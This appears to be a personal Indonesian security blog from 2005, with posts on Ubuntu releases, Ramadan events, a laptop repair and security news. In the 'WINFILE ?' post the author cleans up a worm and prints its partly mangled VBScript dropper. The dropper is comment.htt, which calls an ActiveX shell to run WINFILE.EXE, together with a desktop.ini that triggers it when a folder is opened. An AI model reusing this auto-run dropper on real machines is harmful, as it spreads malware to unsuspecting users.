tulisannya." <introduction - vol III - issue 12 - phile 01 >

sehingga kemungkinan untuk issue #!3 akan dirilis awal taun 2006 , sedangkan CFP a.k.a Call for paper (hasil diskusi dengan "anonymous" ) akan kita keluarkan selepas hari raya "LEBARAN".

tetapi bagi temen temen yang berminat mengirimkan artikel dapat langsung saja mengirimkan artikelnya ataupun mengirim ide, saran, kritik, cacian dan usulan ke ezine@echo.or.id

salam
---
y3dips
Semoga dengan sedikit penjelasan ini dapat melegakan hati temen temen semua, btw thxs atas semua feedback yang di kirimkan, serta kami cukup "bangga" dengan apresiasi temen temen semua, selebihnya mari sumbangkan artikelmu ?

buber ? :(

0 comments
Pertama tama gw minta maaf buat temen temen semua yang ikutan buber karena /me dan adek gak bisa ikutan, yang jelas gw minta maaf buat "adek" yang udah bela belain bermacet macet ria dan berhujan hujanan tapi ternyata Bubernya gak bisa ikutan (kesian dia dah terkulai lemes) :(

Dah berangkat dari jam 1, terus hujan hujan eh malah jam 6 sore baru nyampe PGC , n terus ujan lagi , tapi akhirnya sempet juga mampir ketempat "adek" (nganter balik) :P , walau nyampe rumah lagi agak "malem" , mudah mudahan bubernya sukses yah *_^ , sekali lagi sorry buat semua yang menunggu dengan harap2 cemas akan kehadiran gw (huek .. huek , kayak pejabat :P), sungguh ini gak ada unsur kesengajaan loh .. mudah mudahan lain kali bisa lebih lancar (tanpa ujan dan macet :(, tempatnya mungkin di buat netral yah :P )

Wednesday, October 26, 2005

new echo logo RC 0.1

0 comments

Dah lama pengen nge-deface tampilan homesite echo.or.id cuma masih belum ada waktu dan kesempatan, jadinya aku coba untuk mulai nyicil deh dengan buat logo baru (diatas) yang masih versi release candidate 0.1, adapun untuk artinya kurang lebih sama dengan logo lama, cuma berupa kumpulan huruf "E" "C" "H" "O" yang di bentuk sedemikian rupa berwarna hitam denagn sedikit inner bevel (smooth) ditambah gelombang yang mengartikan kata "echo" bisa berarti "gema" serta di beri warna hijau menyala.

any comment or suggestion ?

Tuesday, October 25, 2005

Laptopku Sayang ..

0 comments
Eit dia ngambek lagee, abis uncompressing kernel dia gak mau loading kernel :( , Hang ??? , ternyata sekarang dia ngambek lagi. Akhirnya terpaksa aku bongkar lagi (was was gitu dech..) , pertama yang jadi target adalah hardisknya aku kira hardisknya bermasalah tapi ternyata gak pake hardiskpun tetep error (aku cobain pake LIVEcd ubuntu), aku coba install ulang juga gagal di ACPI error, wayoh .. (padahal aku emang gak berpengalaman dengan laptopz error).

Akhirnya semuanya aku pretelin, aku lepas batere, cdrom drive, hardisk, memori dan sangkarnya sambil aku cari cari di internet tentang infonya, eh nemuin kalo Tecra 8100 itu permasalahannya adalah di slot memori, akhirnya memori aku cobain satu satu [aku punya 2 buah 128], Ajaib Nyala, wuih aku gak yakin, coba tuker Slot [dengan 1 memori] wuih gak nyala :( , coba pake memori satunya [masih cuma dipasang 1] , di slot yang pertama nyala eh di slot kedua dia gak nyala, aku pasang dua duanya dia balik nge-hang di uncompressing kernel... nah lo? ternyata slot memorinya satunay error, n praktis sekarang gw pake memori 128 :( [ada yang asik disini, buat ngeload XP SP2 , buih berasa lemot abis, tapi ngeload ubuntu tidak terlalu significant (inget, ini loading awal loh :P) , karena /swap gw 1 GB :P] , alhasil semaleman gw nyariin tempat jual memori untuk tecra 8100 dan dapet merk "kingston" tetapi maksimalnya cuma 256 tipe KTT SO100 , hiks hiks.. nah ini juga belum tau beli dimana.. besok deh tanya temen, yang penting bukan motherboard atau error yang parah lainnya, sekarang laptopnya dah bisa jalan walau kudu tertatih tatih :p

Monday, October 24, 2005

Wordis HIMTI Binus

0 comments
Acaranya sih tanggal 18 kemaren di Universitas Bina Nusantara, kebetulan gw ma 0byt3 yang dateng kesono , cuma fotona baru bisa di upload oleh 0byt3 hari ini, dan juga gw baru bisa internet hari ini jadinya baru bisa upload :), banyak kejadian seru dan lucu di situ, asik juga sih :) walau tetap ada hal-hal yang mengganjal di otak gw ampe sekarang :D (yang jelas laptop gw jadi error pas mo seminar, eh pas balik dia sembuh lagi n sekarang lagi MemTest Kernel via Ubuntu tuh :p )

he..he.. gw pake baju gratisan dikasih temen2 HITB waktu bcs05 kemaren
oh iya , kali ini modelnya bukan seminar tapi workshop dengan hands On training, tema yang gw angkat kali ini berjudul " Penetrate @ System dengan sub title "A few collection of X-rubbish technique ", emang sih gak bakal maksimal dengan waktu sesingkat itu (ampe nyolong waktu-nya 0byt3 [bawain materi identify your system] :P ) tapi mudah mudahan sedikit banyak membuka wawasan para peserta.

Matrix is finish !

0 comments
Pertama sih liat iklan di koran soal perubahan tarif GPRS matrix , trus abis baca di forum matrix-centro.com , eh barusan aja abis tilpun 111 n ngobrol panjang lebar ma Customer service-nya :P, dan ternyata emang bener :( , alias buat pemakai tarif flat lama secepatnya melakukan konfirmasi perubahan packet dsb, jika tidak amaka terhitung 1 Desember 2005 maka akan di kenakan tarif retail (15 rp/KB).

Hiks hiks, makin terancam deh kehidupan gw di dunia maya (internet) , kalo gak ada paket flat lagi kayaknya gw harus menyudahi perjalanan dengan "matrix", dan saat ini belum tau mo menggunakan apa untuk memasuki dunia maya ini nantinya, so sebelum itu gw mo menyelesaikan duluw donlodan Breezy Badger gw yang dah 59% [383Mb] sebelum November , hehehehe.

Selanjutnya .. We`ll See .. , soalnya tagihan matrix gw bulan pemakaian September-oktober dah menyentuh level membahayakan (500 rebu [ GPRS 50 % , pulsa 50 %] :P , kalo nyokap tau bisa di semprot abis abisan neh , hehehe , untung "ibuk" gak pernah internetan :P) , dan sapa tau setelah ini bisa jadi hemat banget dan menabung untuk hari tua (hueheuue, walau aku gak habis pikir hidup tanpa bandwidth hiks hiks hiks :()

Thursday, October 20, 2005

Metasploit v2.5

0 comments
Yesterday, H D Moore has announce about the new version of Metasploit Framework. The Metasploit Framework is an advanced open-source exploit development platform. The 2.5 release includes three user interfaces, 105 exploits and 75 payloads.

This release is available from the Metasploit.com web site:
- Unix: http://metasploit.com/tools/framework-2.5.tar.gz
- Win32: http://metasploit.com/tools/framework-2.5.exe

A demonstration of the msfweb interface is running live from:
- http://metasploit.com:55555/

Wednesday, October 19, 2005

Masih Ada malaikat ?

0 comments
Kekampus pagi ?? hal yang paling gw sebelin selain gw kudu bangun pagi (hehehe) terutama dan paling utama (dimarahin guru bahasa nih kalo kata katanya gini :P) adalah macetnya, karena itu gw lebih memilih mutus mutus jalur untuk mempersingkat waktu (i hate traffic jam !, what a wasting time) meskipun dengan catatan naik kendaraan umum lebih banyak dan mengeluarkan biaya sedikit lebih mahal, Nah kebetulan hari ini gw telat bangun :( , sehabis sahur gw tidur lagi dan terbangun pukul 07.10 (padahal harus tiba di kampus jam 08.15) praktis cuma ada waktu 1 jam untuk kekampus. Setelah siap siap akhirnya jam 07.30 saya berangkat kekampus.

Sampai naik angkutan ketiga tidak ada masalah nah begitu pindah ke angkutan keempat (KOPAJA) saya baru menyadari kalau saya tidak memiliki uang "receh" , praktis pecahan terkecil adalah Rp.50.000 , daripada bikin ribut dengan "assisten supir" maka saya menanyakan ke orang yang duduk di sebelah (kebetulan sepertinya seorang mahasiswi yang "alhamdulillah" mengenakan pakaian muslimah)
GW : maaf mbak, punya pecahan 50 ribuan gak ? (sambil gak yakin)
Mbak : aduh, gak punya mas, emang buat apa ? (sudah siap di tangan dengan uang 1500 rupiah)
GW : enggak, cuma buat bayar ongkos , saya gak punya recehan (sambil mikirin gimana cara dapet recehan yah)
Mbak : Oh, kalo gitu pake uang saya aja mas , sambil membuka tas untuk mengambil uang
GW : wah gak usah mbak .. gak usah (dengan ragu ragu :()
Mbak : GPP mas , gak apa apa (sudah memegang uang 5000 rupiah)
GW : Wah biar saya bayar aja ke kernet-nya pake 50ribuan ini mbak sapa tau dia punya kembaliannya

Walhasil akhirnya memakai uang mbak itu karena kernetnya langsung berubah raut mukanya waktu liat uang 50 ribu (maklum masih pagi ...)

***Sambil bingung mo gimana*** coba berpaling ke Mbaknya , Ups ternyata mbaknya lagi "tadarus" ,(sepanjang jalan gw cuma bengong sambil mikirin gimana ngebayar uang si mbak ini, akhirnya gw mutusin untuk berdoa aja buat amal baik mbaknya) , Begitu mulai memasuki gerbang kota Depok mbak-nya merapikan Alquran-nya dan barulah aku tanyakan
GW: mau turun mbak?
Mbak: Iyah
GW: wah saya gak tau gimana bayarnya ya mbak (**tampang gak jelas***)
Mbak: gak usah mas, saya ikhlas kok (sambil senyum)
GW:makasih banget nih mbak, mudah-mudahan amalnya dibales sama yang diatas
Mbak: amin (**sambil tersenyum**)

Lalu bus berhenti dan dia turun.

Ternyata, Masih ada "malaikat" diantara kita, gw yang notabene "pesimis" dan gak pernah mau berharap pada "kebaikan" orang lain ternyata hari ini telah disadarkan, seseorang yang tidak dikenal sebelumnya rela memberikan "uang"nya secara cuma cuma , Sementara masih gak yakin kalo gw bisa ngelakuin hal yang sama, sambil berharap agar "kita semua bisa menjadi malaikat bagi manusia lainnya".

"Sampai sekarang tak ada info yang bisa kudapat mengenai si-mbak , mudah mudahan Allah membalasnya dengan berkali lipat, amin" .

Monday, October 17, 2005

WINFILE ?

1 comments
Dah lama gak main main winblows, eh pas pake winblows buat cobain tuk bahan bicara di BINUS besok terpaksa pake winblows yang dah lama gak dipake (dual ma ubuntu di junk server) , kebetulan aku pake SP2 .. hehehe

nah, kebetulan sekalian ngopiin file "ngaji" ke IPOD via iTunes supaya bisa di dengerin , eh tiba tiba di ipod ada file WINFILE (maklum abis dipake ma adek n baru balik tadi , n ternyata nyisain sedikit oleh oleh :p ) , hehehe, iseng iseng tak eksekusi eh kok gak bereaksi , karena mencurigakan maka tak DELETE aja hehehehe, SHIFT + DEL (biar gak masuk recycle) , yups aman.. eh... wuih filenya tiba tiba muncul lagi :) (ajaib :P) , wuih ... karena males ngeberesinnya , aku pikir nanti deh di ubuntu tak hapus :P (pengen tau secanggih apa sih nih virus kalo gak nemu registry di OS, di linux mana ada registry ..lol.. :P)

Ya udah , install APPSERV (untuk latihan simulasi via webhacking) , tapi tiba tiba pas browse direktori C:\ , eh WINFILE dah muncul disitu dan nongkrong dengan pongahnya (sialan!!) , ya udah deh aku langsung pencet Ctrl+Alt+DEl (walau bego bego gini aku tau dimana biasanya program ini bercokol) , eh ada image name Wuur (yah walau dah lama gak pake windows tapi alhamdulillah masih inget mana service dengan image name aseli dan fake :P , dan juga dulu kebetulan pernah belajar "virus-virus-an" dikit ..heheh...) langsung aja aku kill/matiin (ternyata gak terlalu canggih nih virus) , abis itu tak search semua file WINFILE , n aku delete aja, yup 1 lagi harus cari tau pemicunya (pembangkitnya), biasanya sih di autoexec, startup, or cara termudah ketik di run -- > msconfig (hum, bisa masup, ternyata virusnya cuma buat iseng nih, gak ada canggih canggihnya, gantian /me songong dikit ... :p ), masuk bagian stratup eh nemuin lagi Startup Item WUUR yang mengeksekusi command ke "C:\WINDOWS\TEMP\WUUR.exe", ya udah tinggal drivethrough ke dir WINDOWS\TEMP dan aku delete langsung deh "WUUR.exe", langsung rebes degh (ternyata gw gak goblog goblog banget yah :P ).... sayang gak sempet Reverse engineering file wuurnya abis gw gak mau lama lama di winblows :p

btw dia juga buat dua file lain yang pertama "comment.htt" yang merupakan VBS berisikan
<#ody><#tml>
<#ody >
<#cript language=vbscript>
document.write "
"

<#cript language=vbscript>
On Error Resume Next
Dim we,path,win
we = ""
Path = ""
win=""
Path = Left(document.location, Len(document.location) - 11)
Path = Mid(Path, 9)
Set Ap#leObject = document.ap#lets("lhw")
Ap#leObject.setCLSID ("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")
Ap#leObject.createInstance()
Set Ws#hell = Ap#leObject.GetObject()
Ws#hell.run(Path + "WINFILE.EXE")
<#script>
<#body>
<#html>
<#body>

dan desktop.ini
[.Sh#llCl#ssInfo]
HTMLInfoTipFile=file://C#mment.htt
Conf#rmFileOp = 0

2 file di kacaukan biar kalo buka blog gw gak di blok antivirus :p , sekalian delete aja kedua file itu :)

btw , gw gak pake ANtivirus tuh :P !!!!!!

Sunday, October 16, 2005

XSS worm floods Myspace

0 comments
Antara Kaget dan tidak juga mendengar judulnya , pertama kali tahu dari temen temen di waraxe yang posting artikel soal ini di sini (maklum sekarang dah agak jarnag online) , kenapa aku gak terlalu kaget ? karena belum berapa lama aku telah menulis di blog ini juga tentang kemungkinan serangan yang bisa dilakukan dengan BBCODE dan HTMLcode [ baca juga from html to [bbcode] , disitu aku tidak melengkapi detil tekniknya dengan sengaja :p ] , eh malah muncul jenis worm baru yang cukup menghebohkan myspace.com (merupakan salah satu situs penyedia layanan untuk komunitas seperti friendster dan 360) yang beritanya di rangkum di betanews.com, dan juga di slashdot.org.

Ternyata perkataanku tentang "walau efeknya relatif lebih kecil terhadap system" di post sebelumnya harus aku tarik kembali karena ternyata hal ini terbukti mampu membuat " MySpace was taken offline while the worm was removed from all user profiles." , hehehehehhe .. interesting isnt it ???

Well, first i dont even know each other with that "clever" myspace user, second i dont just give a bullshit on my post in early month (coz ive already prove it *_^) , i tell u the same as i told u in my past post, "our world are so vulnerable" :) , so Watchout!

Saturday, October 15, 2005

History of linux

0 comments
Gara gara iseng iseng mo bantuin "adek" tuk nyari semua-hal (ctrl-a) tentang linux eh malah nemu link bagus "https://netfiles.uiuc.edu/rhasan/linux/" yang ternyata dah dibuat dari tahun 2002 (telat banget, hisk hiks) yang berisikan info mengenai sejarah linux.

Disitu dikatakan bahwa Linus (linus Benedict Torvalds) sendiri pesimis dengan OS yang dia buat
"In August 25, 1991 the historic post was sent to the MINIX news group by Linus .....
From: torvalds@klaava.Helsinki.FI (Linus Benedict Torvalds)
Newsgroups: comp.os.minix
Subject: What would you like to see most in minix?
Summary: small poll for my new operating system
Message-ID: <1991Aug25.205708.9541@klaava.Helsinki.FI>
Date: 25 Aug 91 20:57:08 GMT
Organization: University of Helsinki

Hello everybody out there using minix -
I'm doing a (free) operating system (just a hobby, won't be big and
professional like gnu) for 386(486) AT clones. This has been brewing
since april, and is starting to get ready. I'd like any feedback on
things people like/dislike in minix, as my OS resembles it somewhat
(same physical layout of the file-system (due to practical reasons)
among other things). I've currently ported bash(1.08) and gcc(1.40),and
things seem to work.This implies that I'll get something practical within a
few months, andI'd like to know what features most people would want. Any
suggestions are welcome, but I won't promise I'll implement them :-)
Linus (torvalds@kruuna.helsinki.fi)
PS. Yes - it's free of any minix code, and it has a multi-threaded fs.
It is NOT protable (uses 386 task switching etc), and it probably never
will support anything other than AT-harddisks, as that's
all I have :-(
.


begitu juga dengan komentar dari bapak "minix" Prof.A Tanembaum
" I still maintain the point that designing a monolithic kernel in 1991 is a fundamental error. Be thankful you are not my student. You would not get a high grade for such a design :-)"
(Andrew Tanenbaum to Linus Torvalds)


Hell care , linux sekarang sudah bukan "hacker toys" lagi tapi sudah menjadi salah satu Operating System yang diperhitungkan !

semua berawal dari "ketidakmungkinan" dan "pertentangan" tetapi berakhir dengan "kesuksesan", prosesnya yang akan menentukan !

/me jadi inget waktu bermimpi membuat echo.or.id , "ketidakmungkinan, pertentangan" mudah mudahan berakhir dengan kesuksesan , amin *_^


Friday, October 14, 2005

Ubuntu 5.10 (Breezy Badger)

0 comments
U can Download Breezy Badger at :

  • United States: http://us.releases.ubuntu.com/releases/5.10/
  • Europe: http://se.releases.ubuntu.com/5.10/
  • United Kingdom: http://releases.ubuntu.com/5.10/
  • Rest of the World: http://releases.ubuntu.com/5.10/

    Or u can updated your repository to breezy
    y3dips@heaven:~$ cat /etc/apt/sources.list

    deb cdrom:[Ubuntu 5.04 _Hoary Hedgehog_ - Release i386 (20050407)]/ hoary main restricted

    #deb http://komo.vlsm.org/ubuntu breezy main restricted multiverse universe
    #deb http://komo.vlsm.org/ubuntu breezy-updates main restricted universe multiverse

    ## Uncomment the following two lines to fetch updated software from the network

    deb http://id.archive.ubuntu.com/ubuntu breezy main restricted
    deb-src http://id.archive.ubuntu.com/ubuntu breezy main restricted

    ## Uncomment the following two lines to fetch major bug fix updates produced
    ## after the final release of the distribution.

    deb http://id.archive.ubuntu.com/ubuntu breezy-updates main restricted
    deb-src http://id.archive.ubuntu.com/ubuntu breezy-updates main restricted

    ## Uncomment the following two lines to add software from the 'universe'
    ## repository.
    ## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu
    ## team, and may not be under a free licence. Please satisfy yourself as to
    ## your rights to use the software. Also, please note that software in
    ## universe WILL NOT receive any review or updates from the Ubuntu security
    ## team.

    deb http://id.archive.ubuntu.com/ubuntu breezy universe
    deb-src http://id.archive.ubuntu.com/ubuntu breezy universe

    deb http://security.ubuntu.com/ubuntu breezy-security main restricted
    deb-src http://security.ubuntu.com/ubuntu breezy-security main restricted

    deb http://security.ubuntu.com/ubuntu breezy-security universe
    deb-src http://security.ubuntu.com/ubuntu breezy-security universe

    deb http://archive.ubuntu.com/ubuntu breezy multiverse
    deb-src http://archive.ubuntu.com/ubuntu breezy multiverse

    ## Backports
    #deb http://ubuntu-backports.mirrormax.net/ breezy-backports main universe multiverse restricted
    #deb http://ubuntu-backports.mirrormax.net/ breezy-extras main universe multiverse restricted

    ## Marillat
    #deb ftp://ftp.nerim.net/debian-marillat testing main


  • Thursday, October 13, 2005

    Kumat apa doyan ?

    0 comments
    Hm, Gini nih kalo lagi "kumat" atau lagi "doyan" yah ? , soalnya hari ini aku total kelar ngerjain 2 web blog (Unbelieveable), yang pertama itu blog-nya id-ubuntu di http://ubuntulinux.or.id yang di kerjain dari awal installasi Word press-nya sampe ngedit themes-nya (walau hasilnya gak maksimal, soalnya kemaren dah janjian ma amri shodiq soal dia yang ngerjain themes-nya , jadinya themesnya sekarang itu cuma seadanya alias ngambil gambar situs "id-ubuntu" yang dulu :) ) , sisanya sih ngisi berita dan sedikit artikel di web blog yang aku paksain jadi Home page "id-ubuntu" :p.

    Nah yang kedua adalah blog aku sendiri yang beralamat di http://y3d1ps.blogspot.com alias yang "aku" tulisin ini :P . Jreng .. Jreng .. Jreng .. temanya kali ini adalah Here comes Spidey!, yupe ! , my favourite Super hero ever yang akhirnya (At Last!!!) menjadi themes blog aku kali ini dipadu dengan laba laba pada body content-nya menambah keren blog aku *_^. Pokoknya TOP degh .... Ciaooooo

    Monday, October 10, 2005

    Buka puasa with Echo

    2 comments
    From: "z3r0byt3"
    Date: Sun Oct 9, 2005 10:37 pm
    Subject: [FYI] Tentang Buka Puasa Bersama

    Dear All,

    Masih mengenai rencana untuk acara buka puasa bersama. Meski Masih
    sedikit yang merespon acara ini, tapi saya mewakili teman-teman echo,
    masih tetap semangat untuk mengadakan acara ini.

    Kemarin saya telah melakukan survei tempat untuk acara tersebut.
    Sangat sulit sekali mencari tempat yang bersifat santai namun
    terjangkau. Semua tempat telah terisi penuh pada tanggal tersebut, dan
    kebanyakan dari mereka tidak bisa menerima booking tempat. Di
    sela-sela "nyaris" putus asa, akhirnya alhamdulillah dapat juga tempat
    untuk acara tersebut. Berikut rincian tempat, tanggal, dan biaya serta
    bagaimana cara untuk ikut acara tersebut:

    Hari & tanggal: Sabtu, 29 Oktober 2005
    Tempat : AYAM BAKAR WONG SOLO.
    Jl. Raya Kali Malang Blok A2 8/9
    Pondok Kelapa, Jakarta Timur
    (Tepat Di Lampu Merah Lampiri)

    Biaya per-orang: Rp. 25.000

    Bagi yang berminat pembayaran bisa dilakukan dengan cara seperti
    pendaftaran seminar ECHO di JCC tempo hari. Dengan cara sebagai berikut:

    - Setorkan langsung uang tersebut ke bank mandiri terdekat, dengan
    nomor rek tujuan:

    126-000-4460-886
    A/N: IRVAN S.KOM / AHMAD MUAMMAR WK

    - Simpan bukti setoran, karena bukti ini akan digunakan pada saat
    pendataan ulang pada saat acara buka puasa nanti.

    - Setoran tunai langsung ini dilakukan karena transfer via ATM tidak
    dapat dilakukan jika nominalnya di bawah Rp. 50.000

    - Setelah melakukan setoran dan menyimpan bukti setoran, silahkan
    konfirmasikan melalui email ke alamat z3r0byt3@echo.or.id dengan
    format sbb:

    Subject: Konfirmasi BUBER

    Nama Lengkap:
    No telp :
    No. HP :
    Tanggal Setor:
    Kantor cabang tempat menyetor:

    *Catatan: Format harus benar-benar sama, sebab akan dilakukan
    filtering pada mailbox saya.

    - Acara akan terselenggara jika sampai pada waktu 5 hari sebelum hari
    H, peserta yang sudah melakukan setoran mencapai 30 orang.

    Saya rasa cukup informasi mengenai acara ini. Untuk keterangan lebih
    lanjut, bisa hubungi saya via japri dengan alamat:

    z3r0byt3@echo.or.id
    telp: 021-30110500


    Terimakasih

    -z3r0byt3-

    Sunday, October 09, 2005

    Final Fantasy VII

    0 comments
    Akhirnya baru sempet buat nonton film "FINAL FANTASY VII [advent children]" , kemaren untungnya sempet minjem punya temen :P, ternyata filmnya tuh keren banget !!! (norak deh gw , telat banget taunya :P) , animasi 3D nya itu TOBH banget, alussssss ... , apalagi waktu "cloud" bertarung di jalanan , bueh bueh ... ck ck ck /me gak abis fikir ... salute .. ini baru Hacker yang bikin tuh !!!

    Saturday, October 08, 2005

    Pure..Saturday

    0 comments
    Wahehhe, abiz jalan ma "adek" maen maen ke BLOK-em , ceritanya sih mo nga-buburit (bener gak spell-na?), apa daya "mata beler" ditambah 'level' lagi gak fit (semalem cuma tidur praktis kurang lebih 3 jam , 02.30-03.00 + 04.30-06.30) jadinya "kita" malahan nongkrong di w-net , ajaibnya TUH warnet pake UBUNTU , ajaibnya lagi "rame" loh yang main disana ( dari 15 pc mungkin yang kosong cuma 2 , harganya relatif mahal lageee , 4000 per 30 menit ) , ajaibnya lagi yang jaga-nya "cewe" (walau dia gak mau masangin iPOD gw ke colokan USB dibelakang (gw pasang ndiri :P)) !!!!

    Alhasil jadinya maen di w-net ampe jam 5 (sebenernya mo bantuin cariin bahan buat "adek") trus Ashar di situ juga (puih penuh sesak euy) , trus cari tempat ber-buka-puasa dan bertemulah salah satu tempat makan "CW" (*nama aseli di samarkan , karena produk dagang :P, pesen sih gak salah salah , udah pake juice trus milkshake pulak + fried chicken .. ehuehueue , tapi "adek" gak habis makannya :P , mukanya ampe merah ...heheheh ; emang sih gw yang maksain dia mesen banyak :P) , akhirnya abis sholat maghrib kita cabz .. sampe rumah jam 8 n sekarang kepala !gw nyut.. nyut.. nyut , dan sempet ol bentar buat cek email dari ny.irvan soal beberapa "point" penting yang se-yogya-nya gw respons secepetnya (tapi bukan dengan unsur kesengajaan sehingga gw gak bisa reply ASAP :( ) dan dengan "5 watt" yang tersisa akhirnya berhasil gw respons di hari yang sama walau sedikit telat, maaf yah ...

    Sekarang mo istirahat duluw nih, abis tadi nelpon "adek" eh malah sempet di omelin biar langsung tidur aja sehabis sholat ... heuheuheu ... ciaoooo

    Friday, October 07, 2005

    Breezy Badger RC

    0 comments
    At last , naik peringkat dari preview release ke release candidate , ada yang mau donlodin gw Ubuntu 5.10 (Breezy Badger) Release Candidate di http://releases.ubuntu.com/5.10/ , heheheh

    Gak sabar nih mo cobain :) , cuma GPRS baru bisa kerja pas gw [off] , maybe sabtu, minggu, senin baru tak donlod :P

    Thursday, October 06, 2005

    Choleric Melancholy !

    0 comments
    .... The Extrovert ,The Doer, The Optimist ...

    Weaknesses of a Choleric


    The Choleric's Emotions

  • Bossy
  • Impatient
  • Quick-tempered
  • Can't Relax
  • Too impetuous
  • Enjoys controversy and arguments
  • Won't give up when loosing
  • Comes on too strong
  • Inflexible
  • Is not complimentary
  • Dislikes tears and emotions
  • Is unsympathetic

    The Choleric At Work

  • Little tolerance for mistakes
  • Doesn't analyze details
  • Bored by trivia
  • May make rash decisions
  • May be rude or tactless
  • Manipulates people
  • Demanding of others
  • End justifies the means
  • Work may become his god
  • Demands loyalty in the ranks

    The Choleric As a Friend

  • Tends to use people
  • Dominates others
  • Knows everything
  • Decides for others
  • Can do everything better
  • Is to independent
  • Possessive of friends and mate
  • Can't say, "I'm Sorry"
  • May be right, but unpopular

    Strengths of a Choleric


    The Choleric's Emotions

  • Born leader
  • Dynamic and active
  • Compulsive need for change
  • Must correct wrongs
  • Strong-willed and decisive
  • Unemotional
  • Not easily discouraged
  • Independent and self sufficient
  • Exudes confidence
  • Can run anything

    The Choleric At Work
  • Goal oriented
  • Sees the whole picture
  • Organizes well
  • Seeks practical solutions
  • Moves quickly to action
  • Delegates work
  • Insists on production
  • Makes the goal
  • Stimulates activity
  • Thrives on opposition

    The Choleric As a Friend

  • Has little need for friends
  • Will work for group activity
  • Will lead and organize
  • Is usually right
  • Excels in emergencies

    Thats me [less are truth :P, you decide it? :P] ! how about you ?
    source : http://www.oneishy.com/personality/personality_test.php
  • Tuesday, October 04, 2005

    Romadhon , aku datang :)

    0 comments
    Alhamdulillah ya Allah, Engkau hampir sampaikan umurku kebulan penuh berkah milik-Mu, Semoga di bulan ini nantinya hamba dapat belajar menjadi lebih baik, berbuat lebih baik, berkerja dan beribadah dengan lebih baik serta agar dapat mulus menjalaninya dengan hasil maksimal dan InsyaAllah hasilnya akan berguna untuk kehidupan hamba selanjutnya. amin ya robbal alamin.

    Bagi teman teman semua baik yang di kenal langsung atau tidak maka dengan keikhlasan hati ammar meminta maaf atas semua kesalahan baik yang dilakukan secara sengaja ataupun tidak sengaja, InsyaAllah denagn ini kita semua dapat menikmati kemurnian romadhon.

    Marhaban ya romadhon ....

    Sunday, October 02, 2005

    Clustermind

    0 comments
    Judul dari komik ke-3 yang di terbitkan zone-h ini di rilis bertepatan dengan acara HITB2005 yang baru selesai di laksanakan beberapa hari yang lalu , wah setelah membaca edisi ketiga ini ternyata aku makin melihat keseriusan Roberto Preatoni a.ka SyS64738 dalam membuat komik hacking, soalnya antara ketiga episode di komik ini saling berhubungan dan di garap dengan sangat serius(ck.. ck ..ck salut euy .. bikin komik ? hacker ? ), hehehe dan ternyata disini di kasih tau kenapa "spoonfork" (HITB guys) dapet nama itu ? padahal dah ketemu orangnya (@BCS2005) tapi tetep gak tau , n ternyata dia "jago" lock picking ..ehheheh.. (bener gak yah ?), disini juga "creator" NMAP ikut nampil .. ehheheh , buat yang mo baca langsung aja ke http://www.zone-h.org/comics/ , pokoknya TOP abis degh *_^

    ide ceritanya tentang Clustering , nah tapi disini yang di Cluster adalah "Mind" .[silly question , apa pake openmindsix [plesetan dari openmosix project :P] yah clusteringnya , hehehehe , ada ada aja :p

    time?

    2 comments
    lagi d cipes nih , nungguin anak anak echo [staff echo] yang janjiannya jam 11 tapi belon pada nonggol ;p

    agile-nya gak mau konek di xda gw, jabber-nya jg susah apa pd ngambek yah , untung ada pocketblogger ini jadinya bs curhat, woi ... pada kemana ? woiiiiii...eh ini 0byt3 br nonggol ma bu chika ;p

    Saturday, October 01, 2005

    Breezy Badger

    2 comments
    Nungguin release resmi Ubuntulinux 5.10 (Breezy Badger) yang katanya dilakukan di bulan oktober membuat gw bersemangat untuk berkunjung ke situsnya di ubuntulinux.org pas tanggal 1 oktober teng (biarin deh soal BBM :P apalagi soal G30S PKI :P ... tauk ach) , tapi pas gw pantengin kesitusnya ternyata belun ada , mo donlod preview releasenya nanggung juga (mending donlod yang public release aja sekalian), mo minta kirimin cd-nya tetep aja males karena perlakuan "oknum" bea cukai dan PT.POS, jadinya biarin deh GPRS ma server-junk gw lembur ampe 3 malem (pas gw donlod .iso whax)

    apa sih yang menarik di release terbaru ubuntu ini , cek this out !
    About Ubuntu 5.10 Preview
    -------------------------

    To see it all, you'll need to try the CD, but the highlights
    include:

    On the Desktop

    * GNOME 2.12 -- Very fresh... Released yesterday!!
    * OpenOffice.org 2.0 beta 2
    * X.org 6.8.2 with wider hardware support
    * An enhanced tool for easily installing new applications
    (see "Add/Remove Programs" in the System Administration menu)
    * A new tool which makes it easy to install support for
    multiple languages (Language Selector)
    * Editable GNOME menus
    * Applications are now linked into the Launchpad infrastructure
    (new entries on the Help menus for translation and support)
    * Support for writing audio CDs (Serpentine)
    * Graphical boot process with progress bar (USplash)

    On the Server

    * PHP5
    * Support for installing directly onto LVM volumes
    * Built-in thin client functionality produced in cooperation
    with the LTSP project (http://wiki.ubuntu.com/ThinClientHowto)
    * Simple NFS root setup with automatic hardware detection
    through initramfs-tools
    * Support for up to 4 gigabytes of RAM by default on 32-bit
    architectures
    * Kernel support for cluster filesystems (OCFS2 and GFS)

    Hardware Support Improvements

    * Linux 2.6.12.5 with many updated drivers from third parties
    * Further enhancements to laptop support (hot keys,
    and working suspend/resume on more models)
    * HP all-in-one printer/scanner devices are supported out of
    the box
    * Bluetooth input devices (such as keyboards and mice) are
    supported out of the box
    * Multiple audio devices are handled more gracefully (and one
    can easily select the default device)
    * 64-bit PowerPC kernel available

    Installation

    * A new OEM mode to simplify the process of preinstalling
    Ubuntu on computers for resale or redistribution
    * Automatically makes existing hard drive partitions available
    to the desktop
    * Simple "dual boot" configuration with automatic resizing of
    an existing installed OS
    * The second stage of the installation now has a progress bar

    "Under the hood"

    * GCC 4.0.1
    * glibc 2.3.5
    * New early userspace infrastructure based on initramfs-tools
    * More modular X.org packaging

    As always, Ubuntu includes the very best of the 100% FREE / LIBRE
    application software world, and each new release incorporates
    countless new features and bugfixes from the global development
    community.
    so ??, long live Ubuntu !!

    Friday, September 30, 2005

    Playlist[updated]

    0 comments

    aku ingin menjadi mimpi indah dalam tidurmu
    aku ingin menjadi sesuatu yg mungkin bisa kau rindu
    karena langkah merapuh tanpa dirimu
    oh karena hati tlah letih

    aku ingin menjadi sesuatu yg selalu bisa kau sentuh
    aku ingin kau tahu bahwa ku selalu memujamu
    tanpamu sepinya waktu merantai hati
    oh bayangmu seakan-akan

    kau seperti nyanyian dalam hatiku
    yg memanggil rinduku padamu
    seperti udara yg kuhela kau selalu ada

    hanya dirimu yg bisa membuatku tenang
    tanpa dirimu aku merasa hilang
    dan sepi, dan sepi

    selalu ada, kau selalu ada

    DeaLova - Once

